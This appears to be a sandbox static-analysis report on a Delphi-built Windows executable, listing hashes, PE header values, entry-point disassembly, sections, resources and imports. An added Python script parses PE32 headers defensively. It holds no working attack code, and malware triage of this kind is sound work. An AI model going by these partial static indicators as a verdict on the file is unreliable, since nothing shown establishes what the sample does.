                                                                  SHA1:dcb684e452d59af4b1bc7b5de4bdccd2b82a967b
                                                                  SHA256:bfc7a921cd679ab7d693e30c552e352a7c564a75ec7e60b25960c63ae9067938
                                                                  SHA512:1c77efd15a2b3dc3e74d8c808cbcbb15122699754169616e68ea024845447eacfef18b3358ed4d4ca397239f1ed9c9162cd568766baff5732c83f65f8293740d
                                                                  SSDEEP:12288:STHHBp6sm4kri5y5dnjxfJz+V3pr+Tykm9W9LDFo+hjr0ls5PsY9Dv7QC:SThoLrimdnjxxwZAk65PvHL
                                                                  TLSH:94258E2AA9A07231C5F716788F676AF4D81D7E262ABCED0432832D4CDE39594F039357
                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                  Icon Hash:4aaeaaa3a3ae884a
                                                                  Entrypoint:0x47081c
                                                                  Entrypoint Section:.itext
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:e7a7090255a5f7875fe104755dd5cb81
                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  add esp, FFFFFFF0h
                                                                  mov eax, 0046FAC8h
                                                                  call 00007F54DCDA2CD5h
                                                                  mov eax, dword ptr [00472C84h]
                                                                  mov eax, dword ptr [eax]
                                                                  call 00007F54DCDF9151h
                                                                  mov ecx, dword ptr [00472B58h]
                                                                  mov eax, dword ptr [00472C84h]
                                                                  mov eax, dword ptr [eax]
                                                                  mov edx, dword ptr [0046ED00h]
                                                                  call 00007F54DCDF9151h
                                                                  mov ecx, dword ptr [00472B88h]
                                                                  mov eax, dword ptr [00472C84h]
                                                                  mov eax, dword ptr [eax]
                                                                  mov edx, dword ptr [00460EB0h]
                                                                  call 00007F54DCDF9139h
                                                                  mov eax, dword ptr [00472C84h]
                                                                  mov eax, dword ptr [eax]
                                                                  call 00007F54DCDF91ADh
                                                                  call 00007F54DCDA0A54h
                                                                  lea eax, dword ptr [eax+00h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                   Name | Virtual Address | Virtual Size | Is in Section
                                                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0x77000 | 0x28f0 | .idata
                                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x85000 | 0x7a200 | .rsrc
                                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7c000 | 0x8024 | .reloc
                                                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x7b000 | 0x18 | .rdata
                                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x77798 | 0x658 | .idata
                                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                   .text | 0x1000 | 0x6ed50 | 0x6ee00 | daa369c1c7302cafea809093a53a0507 | False | 0.5089354918263811 | data | 6.544039894422103 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                   .itext | 0x70000 | 0x87c | 0xa00 | fe34997d59685c957fb3750e4d557caa | False | 0.5296875 | data | 5.614720387175179 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                   .data | 0x71000 | 0x1e30 | 0x2000 | 43382a1eaa80d3c01ce80587b6288384 | False | 0.4013671875 | data | 3.8854181170774957 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   .bss | 0x73000 | 0x36f8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   .idata | 0x77000 | 0x28f0 | 0x2a00 | 6b443f0f4779220e4f9e1bd6895f4e31 | False | 0.31138392857142855 | data | 5.125914990690079 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   .tls | 0x7a000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   .rdata | 0x7b000 | 0x18 | 0x200 | 9ff41def55ab2d70218df758701840df | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                   .reloc | 0x7c000 | 0x8024 | 0x8200 | 384f5029685514f75716c11855b1d830 | False | 0.6024939903846154 | data | 6.662919273857788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                   .rsrc | 0x85000 | 0x7a200 | 0x7a200 | 650dcd0b75b5d035dc0efcbda1866dcf | False | 0.3839180047338792 | data | 6.478200952823624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
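The header fields above (Entrypoint 0x47081c in .itext, Imagebase 0x400000, Time Stamp 0x2A425E19) and the section table are what a PE parser derives from the COFF header, the optional header and the section headers that follow them. 0x2A425E19 is the constant TimeDateStamp that Delphi's linker writes in place of the build time (it decodes to 19 June 1992), so it identifies the toolchain, consistent with the TrID "Delphi generic" hit, rather than dating the build; a stamp that old is most likely what the report's "suspicious time stamp" signature reacts to. The script below is an added example, not part of the Joe Sandbox report: it parses a header-only image constructed in memory from the values in the tables above (section bodies omitted), maps the entry-point RVA to its section, decodes the time stamp, and flags any section that is both writable and executable. It handles PE32 only (optional-header magic 0x10b); PE32+ lays the optional header out differently.

```python
# Added example (not part of the Joe Sandbox report): a minimal PE32 header
# reader run against a header-only image constructed from the report's tables.
import struct
from dataclasses import dataclass
from datetime import datetime, timezone

DELPHI_LINK_TIMESTAMP = 0x2A425E19      # constant TimeDateStamp written by Delphi's linker
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    characteristics: int

    def contains_rva(self, rva: int) -> bool:
        # the loader maps the larger of the two sizes, so use that as the span
        span = max(self.virtual_size, self.raw_size)
        return self.virtual_address <= rva < self.virtual_address + span


def parse_pe32(data: bytes) -> dict:
    """Read the DOS stub pointer, COFF header, PE32 optional header and section headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled in this example")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]     # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt + 28)[0]    # ImageBase
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i                            # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size = struct.unpack_from("<III", data, off + 8)
        flags = struct.unpack_from("<I", data, off + 36)[0]
        sections.append(Section(name, va, vsize, raw_size, flags))
    entry_section = next((s.name for s in sections if s.contains_rva(entry_rva)), None)
    wx = [s.name for s in sections
          if s.characteristics & IMAGE_SCN_MEM_WRITE and s.characteristics & IMAGE_SCN_MEM_EXECUTE]
    return {
        "machine": machine,
        "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, timezone.utc).isoformat(),
        "delphi_timestamp": timestamp == DELPHI_LINK_TIMESTAMP,
        "entry_va": image_base + entry_rva,
        "entry_section": entry_section,
        "wx_sections": wx,
        "sections": sections,
    }


# (name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics) copied from the report.
REPORT_SECTIONS = [
    (".text",  0x1000,  0x6ED50, 0x6EE00, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".itext", 0x70000, 0x87C,   0xA00,   IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data",  0x71000, 0x1E30,  0x2000,  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".bss",   0x73000, 0x36F8,  0x0,     IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".idata", 0x77000, 0x28F0,  0x2A00,  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".tls",   0x7A000, 0x34,    0x0,     IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rdata", 0x7B000, 0x18,    0x200,   IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".reloc", 0x7C000, 0x8024,  0x8200,  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ),
    (".rsrc",  0x85000, 0x7A200, 0x7A200, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
]


def build_header_only_image() -> bytes:
    """Constructed stand-in for the sample: headers only, values from the report, no section bodies."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    # Machine i386, section count, Delphi stamp, no symbols, PE32 optional header size,
    # Characteristics 0x818E = the flag set listed under "Image File Characteristics".
    coff = struct.pack("<HHIIIHH", 0x14C, len(REPORT_SECTIONS), DELPHI_LINK_TIMESTAMP, 0, 0, 0xE0, 0x818E)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, 0x7081C)                     # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)                    # ImageBase
    headers = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, raw, 0, 0, 0, 0, 0, flags)
        for name, va, vsize, raw, flags in REPORT_SECTIONS)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + headers


if __name__ == "__main__":
    info = parse_pe32(build_header_only_image())
    print(f"entry {info['entry_va']:#x} in {info['entry_section']}, "
          f"stamp {info['timestamp_utc']} delphi={info['delphi_timestamp']}, W+X={info['wx_sections']}")
```

To run it on the real file, replace `build_header_only_image()` with the bytes read from disk; the parser only touches offsets inside the headers, so a truncated copy that keeps the first few kilobytes is enough.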
                                                                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                   RT_CURSOR | 0x86364 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
                                                                   RT_CURSOR | 0x86498 | 0x134 | data | English | United States | 0.4642857142857143
                                                                   RT_CURSOR | 0x865cc | 0x134 | data | English | United States | 0.4805194805194805
                                                                   RT_CURSOR | 0x86700 | 0x134 | data | English | United States | 0.38311688311688313
                                                                   RT_CURSOR | 0x86834 | 0x134 | data | English | United States | 0.36038961038961037
                                                                   RT_CURSOR | 0x86968 | 0x134 | data | English | United States | 0.4090909090909091
                                                                   RT_CURSOR | 0x86a9c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
                                                                   RT_BITMAP | 0x86bd0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                                                                   RT_BITMAP | 0x86da0 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
                                                                   RT_BITMAP | 0x86f84 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                                                                   RT_BITMAP | 0x87154 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
                                                                   RT_BITMAP | 0x87324 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
                                                                   RT_BITMAP | 0x874f4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
                                                                   RT_BITMAP | 0x876c4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
                                                                   RT_BITMAP | 0x87894 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                                                                   RT_BITMAP | 0x87a64 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
                                                                   RT_BITMAP | 0x87c34 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                                                                   RT_BITMAP | 0x87e04 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.39864864864864863
                                                                   RT_BITMAP | 0x87f2c | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
                                                                   RT_BITMAP | 0x88054 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
                                                                   RT_BITMAP | 0x8817c | 0xe8 | Device independent bitmap graphic, 13 x 16 x 4, image size 128 | English | United States | 0.36637931034482757
                                                                   RT_BITMAP | 0x88264 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.3614864864864865
                                                                   RT_BITMAP | 0x8838c | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
                                                                   RT_BITMAP | 0x884b4 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.49038461538461536
                                                                   RT_BITMAP | 0x88584 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3716216216216216
                                                                   RT_BITMAP | 0x886ac | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.2905405405405405
                                                                   RT_BITMAP | 0x887d4 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.38175675675675674
                                                                   RT_BITMAP | 0x888fc | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
                                                                   RT_BITMAP | 0x88a24 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
                                                                   RT_BITMAP | 0x88b4c | 0xe8 | Device independent bitmap graphic, 12 x 16 x 4, image size 128 | English | United States | 0.3620689655172414
                                                                   RT_BITMAP | 0x88c34 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.3581081081081081
                                                                   RT_BITMAP | 0x88d5c | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.375
                                                                   RT_BITMAP | 0x88e84 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.47115384615384615
                                                                   RT_BITMAP | 0x88f54 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.36824324324324326
                                                                   RT_BITMAP | 0x8907c | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.28716216216216217
                                                                   RT_BITMAP | 0x891a4 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
                                                                   RT_BITMAP | 0x892cc | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.375
                                                                   RT_BITMAP | 0x893f4 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.375
                                                                   RT_BITMAP | 0x8951c | 0xe8 | Device independent bitmap graphic, 13 x 16 x 4, image size 128 | English | United States | 0.36637931034482757
                                                                   RT_BITMAP | 0x89604 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.35135135135135137
                                                                   RT_BITMAP | 0x8972c | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.36486486486486486
                                                                   RT_BITMAP | 0x89854 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.47115384615384615
                                                                   RT_BITMAP | 0x89924 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3581081081081081
                                                                   RT_BITMAP | 0x89a4c | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.28716216216216217
                                                                   RT_BITMAP | 0x89b74 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
                                                                   RT_ICON | 0x89c5c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1837 x 1837 px/m | | | 0.6099290780141844
                                                                   RT_ICON | 0x8a0c4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1837 x 1837 px/m | | | 0.45081967213114754
                                                                  RT_ICON0x8aa4c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1837 x 1837 px/m0.3166041275797373
                                                                  RT_ICON0x8baf40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1837 x 1837 px/m0.19512448132780083
                                                                  RT_DIALOG0x8e09c0x52data0.7682926829268293
                                                                  RT_DIALOG0x8e0f00x52data0.7560975609756098
                                                                  RT_STRING0x8e1440xecdata0.5466101694915254
                                                                  RT_STRING0x8e2300x364data0.4423963133640553
                                                                  RT_STRING0x8e5940x184data0.5876288659793815
                                                                  RT_STRING0x8e7180xc8data0.685
                                                                  RT_STRING0x8e7e00x118data0.6035714285714285
                                                                  RT_STRING0x8e8f80x39cdata0.4199134199134199
                                                                  RT_STRING0x8ec940x378data0.36824324324324326
                                                                  RT_STRING0x8f00c0x394data0.4017467248908297
                                                                  RT_STRING0x8f3a00x400data0.349609375
                                                                  RT_STRING0x8f7a00x190data0.4975
                                                                  RT_STRING0x8f9300xccdata0.6225490196078431
                                                                  RT_STRING0x8f9fc0x1c4data0.5376106194690266
                                                                  RT_STRING0x8fbc00x3d4data0.3163265306122449
                                                                  RT_STRING0x8ff940x320data0.41875
                                                                  RT_STRING0x902b40x2b4data0.407514450867052
                                                                  RT_RCDATA0x905680x10data1.5
                                                                  RT_RCDATA0x905780x348data0.705952380952381
                                                                  RT_RCDATA0x908c00x6d3aaRIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 22050 HzEnglishUnited States0.3927049946133455
                                                                  RT_RCDATA0xfdc6c0x11f8Delphi compiled form 'Tfrm_lin_system'0.4482608695652174
                                                                  RT_RCDATA0xfee640x4fDelphi compiled form 'TSolutions'0.9873417721518988
                                                                  RT_GROUP_CURSOR0xfeeb40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                  RT_GROUP_CURSOR0xfeec80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                  RT_GROUP_CURSOR0xfeedc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                  RT_GROUP_CURSOR0xfeef00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                  RT_GROUP_CURSOR0xfef040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                  RT_GROUP_CURSOR0xfef180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                  RT_GROUP_CURSOR0xfef2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                  RT_GROUP_ICON0xfef400x3edata0.8709677419354839
                                                                  RT_MANIFEST0xfef800x245XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5249569707401033
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, AnimateWindow, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
